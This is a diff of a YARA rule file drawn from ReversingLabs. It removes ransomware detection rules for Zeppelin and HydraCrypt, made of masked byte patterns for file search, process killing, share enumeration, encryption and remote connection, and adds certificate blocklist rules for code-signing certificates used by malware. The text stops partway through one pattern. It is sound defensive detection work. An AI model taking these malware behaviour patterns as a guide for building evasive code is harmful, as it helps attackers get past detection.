+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "097655cb2965ae71efb905ddf20ed30c240d25e03d08a1b6c87b472533ccc9d8"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Zeppelin"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_files_p1 = {
-            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64
-            89 20 8D 45 ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 8B 45 ?? E8 ??
-            ?? ?? ?? 8B D8 8B 45 ?? E8 ?? ?? ?? ?? 2B D8 43 53 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 42
-            8B 45 ?? 59 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? FF 30 FF 75 ?? 68 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? 83 F8
-            ?? 7C ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84
-            ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            C3
-        }
-		$search_files_p2 = {
-            8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ??
-            ?? 64 FF 30 64 89 20 F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 45 ?? 50
-            8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 8D
-            ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ??
-            33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ??
-            ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5B 8B E5 5D C3
-        }
-		$kill_processes = {
-            55 8B EC 33 C9 51 51 51 51 51 51 51 51 53 56 57 84 D2 74 ?? 83 C4 ?? E8 ?? ?? ?? ??
-            88 55 ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 D2 55 68 ?? ?? ?? ??
-            64 FF 32 64 89 22 8D 55 ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B D8 8B 45 ?? 89 58 ?? 8B C3 B2 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ??
-            C6 40 ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 83 E8 ?? 8B 00 8B F0 85 F6
-            7E ?? BB ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? 0F B6 54 1A ?? E8 ?? ?? ?? ?? 8B 45 ?? 50 8D
-            55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 58 E8 ?? ?? ?? ?? 75 ?? 8D 55 ?? 8B 45
-            ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 40 ?? 8B 08 FF 51 ?? 8D 45 ?? E8 ?? ?? ?? ??
-            EB ?? 8D 45 ?? 8B 55 ?? 0F B6 54 1A ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? E8 ?? ?? ??
-            ?? 43 4E 75 ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? B1 ?? 33
-            D2 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ??
-            8B 45 ?? 80 7D ?? ?? 74 ?? E8 ?? ?? ?? ?? 64 8F 05 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 5F
-            5E 5B 8B E5 5D C3
-        }
-		$enum_shares = {
-            55 8B EC B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 ?? 51 53 56 57 89 45 ?? 8B 45 ?? E8 ?? ??
-            ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64
-            89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 4D ?? 33
-            D2 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 89 45 ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B
-            45 ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 55 ?? B8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 FF 52 ?? 48 85
-            C0 0F 8C ?? ?? ?? ?? 40 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 8B 55 ?? 8B 45 ?? 8B
-            18 FF 53 ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 33 C0 55 68 ?? ?? ?? ?? 64
-            FF 30 64 89 20 FF 75 ?? 68 ?? ?? ?? ?? 8D 4D ?? 33 D2 8B 45 ?? E8 ?? ?? ?? ?? 8B 45
-            ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ??
-            8D 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89
-            10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 75 ?? FF 45 ??
-            FF 4D ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A
-            59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ??
-            ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB
-            ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$encrypt_files = {
-            55 8B EC 83 C4 ?? 53 56 33 DB 89 5D ?? 84 D2 74 ?? 83 C4 ?? E8 ?? ?? ?? ?? 8B D9 88
-            55 ?? 8B F0 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 D2 8B C6 E8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 88 5E ?? 88 5E ?? 56 6A ?? 8D 46 ?? 50 B9 ?? ?? ?? ?? 33 D2 33 C0 E8 ??
-            ?? ?? ?? 8B D8 89 5E ?? 85 DB 75 ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? 8B 45 ??
-            89 45 ?? C6 45 ?? ?? 8D 45 ?? 50 6A ?? 8B 0D ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ??
-            ?? C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "1f:84:e0:30:a0:ed:10:d5:ff:e2:b8:1b" and 1476869735 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_88346267057C0A82E2F39851D1B9694C : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "3be920eb-7b71-53c4-94b7-0ffc88d14c59"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L17160-L17178"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "60acdbad8ad3e1d4a863ce160d93abd0b5e2b214858cba84f7a1b907d2491486"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $kill_processes ) and ( $enum_shares ) and ( all of ( $search_files_p* ) ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hudson LLC" and ( pe.signatures [ i ] . serial == "00:88:34:62:67:05:7c:0a:82:e2:f3:98:51:d1:b9:69:4c" or pe.signatures [ i ] . serial == "88:34:62:67:05:7c:0a:82:e2:f3:98:51:d1:b9:69:4c" ) and 1595376000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Hydracrypt : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_A46F9D8784778Baa48167C48Bbc56F30 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects HydraCrypt ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2e780f7c-8d6d-51c8-b65e-330cc3b17bb7"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "72d36a5f-6599-5456-ac67-0589e37bd035"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.HydraCrypt.yara#L1-L174"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "910a6f23f06cecb8d3115ebfed42a66412dbd0d3a519e39f21df81b0c2028f48"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L17180-L17198"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "fffb6309355bc6764b0ab033db5964599c86c9a2f6d8985975a07f6b3ebb40ed"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "HydraCrypt"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection_1 = {
-            55 8B EC 83 EC ?? 53 56 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 BE ?? ?? ?? ?? 56
-            33 DB 53 53 6A ?? 68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ??
-            59 59 53 53 6A ?? 53 53 6A ?? FF 75 ?? FF 75 ?? FF D0 89 45 ?? 3B C3 0F 84 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 53 56 53 53 68 ?? ?? ?? ?? FF 75 ?? 68
-            ?? ?? ?? ?? FF 75 ?? FF D0 89 45 ?? 3B C3 0F 84 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 6A ??
-            E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 6A ?? FF D0 8B F0 68 ?? ?? ?? ?? 56 E8 ?? ?? ??
-            ?? FF 75 ?? 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? FF 75 ?? 56 E8 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? FF 75 ?? 56 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ??
-            BF ?? ?? ?? ?? 57 89 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 56 50 57 FF 75 ?? E8 ?? ?? ?? ??
-            83 C4 ?? 5F 39 5D ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 59 39 5D ?? 74 ?? FF 75 ?? E8 ??
-            ?? ?? ?? 59 39 5D ?? 5E 5B 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 59 C9 C3
-        }
-		$remote_connection_2 = {
-            55 8B EC 83 EC ?? 53 56 57 6A ?? 59 68 ?? ?? ?? ?? 33 DB BE ?? ?? ?? ?? 8D 7D ?? 6A
-            ?? 89 5D ?? F3 A5 E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 53 53 53 8D 4D ?? 51 FF D0 8B
-            F8 3B FB 75 ?? 33 C0 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 53 68
-            ?? ?? ?? ?? 53 53 FF 75 ?? 57 FF D0 8B F0 3B F3 75 ?? 53 E8 ?? ?? ?? ?? 59 EB ?? 68
-            ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 6A ?? 8D 4D ?? 51 FF D0 68 ?? ?? ?? ?? 6A ??
-            E8 ?? ?? ?? ?? 59 59 8D 4D ?? 51 6A ?? 8D 4D ?? 51 56 FF D0 39 5D ?? 75 ?? 57 E8 ??
-            ?? ?? ?? 56 E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 40 EB ?? 68 ?? ??
-            ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 4D ?? 51 FF D0 33 C9 3B C8 1B C0
-            F7 D8 5F 5E 5B C9 C3
-        }
-		$remote_connection_3 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 BE ?? ?? ?? ?? 8D 7D ?? A5 A5 33 DB 66 A5 53 8D
-            45 ?? 53 50 A4 E8 ?? ?? ?? ?? 59 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 83 C4 ?? BE ?? ?? ?? ?? 56 53 FF D0 56
-            50 89 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? FF D0 BF ?? ?? ?? ?? 57 50 89 45 ?? E8 ?? ?? ??
-            ?? 59 59 85 DB 7E ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 59 8B C3 6A ?? 99 59
-            F7 F9 85 D2 75 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 6A ??
-            E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 8B 45 ?? 0F B6 04 03
-            50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 55 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 43 3B DE 7C ?? E8 ?? ?? ?? ?? 8B F0 E8 ?? ?? ?? ?? 50 56 8D 85 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 55 ?? 83 C4 ?? 83 7D ?? ?? BB ?? ?? ?? ?? BE ?? ?? ??
-            ?? 75 ?? 53 56 57 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ??
-            75 ?? 53 56 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F
-            5E 5B C9 C3
-        }
-		$encrypt_files_1 = {
-            8A 45 ?? 04 ?? 66 98 66 89 45 ?? 0F B7 C0 50 8D 45 ?? 68 ?? ?? ?? ?? 50 FF 55 ?? 68
-            ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 FF D0 8B F0 83 FE ?? 74 ?? 83
-            FE ?? 74 ?? 83 FE ?? 75 ?? FF 75 ?? 8D 45 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 83 FE ?? 74 ?? 83 FE ?? 75 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 57 6A ?? E8 ?? ?? ??
-            ?? 59 59 68 ?? ?? ?? ?? FF D0 FF 45 ?? 83 7D ?? ?? 0F 8C ?? ?? ?? ?? 83 3D ?? ?? ??
-            ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 BE
-            ?? ?? ?? ?? 56 6A ?? E8 ?? ?? ?? ?? 59 59 53 53 8D 8D ?? ?? ?? ?? 51 53 FF D0 8D 85
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8
-            ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ??
-            75 ?? E8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 53 FF D0 56 6A
-            ?? E8 ?? ?? ?? ?? 59 59 53 6A ?? 8D 8D ?? ?? ?? ?? 51 53 FF D0 8D 85 ?? ?? ?? ?? 50
-            8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 55 ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 6A ?? 53 53 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 53 FF D0 57 6A ?? E8 ?? ?? ??
-            ?? 59 59 68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 53 FF D0 5F
-            5E 33 C0 5B C9 C2
-        }
-		$encrypt_files_2 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 BE ?? ?? ?? ?? 8D 7D ?? A5 A5 33 DB 66 A5 53 8D
-            45 ?? 53 50 A4 E8 ?? ?? ?? ?? 59 50 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 7D ?? A5 A5 89
-            45 ?? 8D 45 ?? 50 66 A5 E8 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
-            ?? 89 45 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 FF D0 BE ?? ?? ?? ?? 8D 7D ?? A5 A5 66 A5 BE
-            ?? ?? ?? ?? 8D 7D ?? A5 A5 A5 53 89 45 ?? 8D 45 ?? 53 50 66 A5 E8 ?? ?? ?? ?? 59 50
-            E8 ?? ?? ?? ?? 8B F0 8D 45 ?? 50 E8 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            6A ?? 89 45 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 6A ?? 8D 8D ?? ?? ?? ?? 51 53 FF D0 BF ??
-            ?? ?? ?? 57 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 55 ?? 68 ??
-            ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 8D 8D ?? ?? ?? ?? 51 FF D0 68 ?? ?? ?? ??
-            6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 53 53 FF D0 8B F0 53 56 E8 ?? ?? ?? ?? 59
-            59 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 FF
-            D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF
-        }
-		$encrypt_files_3 = {
-            D0 E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 85 C0 75 ?? BE ?? ?? ??
-            ?? EB ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? FF D0 56 E8 ?? ??
-            ?? ?? 59 3C ?? 75 ?? BE ?? ?? ?? ?? 56 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF D0 56 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D0
-            E8 ?? ?? ?? ?? 56 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF
-            D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF
-            D0 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 53 6A ?? 8D 8D ?? ?? ?? ?? 51 53 FF D0 68 ?? ?? ?? ?? 57 8D 85 ?? ??
-            ?? ?? 50 BE ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50 FF 55 ?? 68 ?? ?? ?? ?? 57 8D 85 ??
-            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 56 50 FF 55 ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 7D ?? A5 68 ?? ?? ??
-            ?? 6A ?? 66 A5 E8 ?? ?? ?? ?? 83 C4 ?? 53 FF D0 6A ?? FF 75 ?? A3 ?? ?? ?? ?? FF 55
-            ?? 6A ?? FF 75 ?? 8B F0 FF 55 ?? FF 75 ?? 89 45 ?? 53 E8 ?? ?? ?? ?? 8D 45 ?? 50 FF
-        }
-		$encrypt_files_4 = {
-            35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 66 85 C0 75 ?? 33 C0 40 E9 ?? ?? ?? ?? 8B 3D
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 8B C8 8B 45 ?? 53 57 99 53 53
-            2B C2 68 ?? ?? ?? ?? D1 F8 2D ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 8B C6 99 2B C2 D1 F8 2D
-            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 53 FF D1 A3 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? 51 FF D0 E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0
-            BE ?? ?? ?? ?? 85 C0 75 ?? 56 6A ?? E8 ?? ?? ?? ?? 59 59 53 53 53 68 ?? ?? ?? ?? 53
-            53 FF D0 56 6A ?? E8 ?? ?? ?? ?? 59 59 53 53 53 68 ?? ?? ?? ?? 53 53 FF D0 39 1D ??
-            ?? ?? ?? 75 ?? 6A ?? 58 EB ?? 6A ?? 59 33 C0 68 ?? ?? ?? ?? 89 5D ?? 8D 7D ?? 6A ??
-            F3 AB E8 ?? ?? ?? ?? 59 59 6A ?? FF D0 EB ?? 83 F8 ?? 74 ?? 68 ?? ?? ?? ?? 6A ?? E8
-            ?? ?? ?? ?? 59 59 8D 4D ?? 51 FF D0 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 8D 4D
-            ?? 51 FF D0 6A ?? 59 8D 75 ?? BF ?? ?? ?? ?? F3 A5 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ??
-            ?? 59 59 53 53 53 8D 4D ?? 51 FF D0 3B C3 75 ?? 8B 45 ?? 5F 5E 5B C9 C2 ?? ?? 6A ??
-            E9
-        }
-		$remote_connection_4 = {
-            55 8B EC 51 51 53 56 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 59 59 33 F6 56 56 56 6A ??
-            68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 6A ?? 8B D8 E8 ?? ?? ?? ?? 59 59 56 56 6A ?? 56
-            56 6A ?? FF 75 ?? 53 FF D0 68 ?? ?? ?? ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 59 59 56 68
-            ?? ?? ?? ?? 56 56 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? FF D0 68 ?? ?? ??
-            ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 59 59 56 56 56 56 FF 75 ?? FF D0 53 E8 ?? ?? ?? ??
-            FF 75 ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 5E 5B C9 C3
-        }
-		$remote_connection_5 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 33 FF 68 ?? ?? ?? ?? 47 57 E8 ?? ?? ?? ?? 59 59
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? BE ?? ?? ?? ?? 56 57 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51
-            FF D0 56 57 E8 ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 56 57 E8
-            ?? ?? ?? ?? 59 59 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D0 68 ?? ?? ?? ?? 6A ?? E8
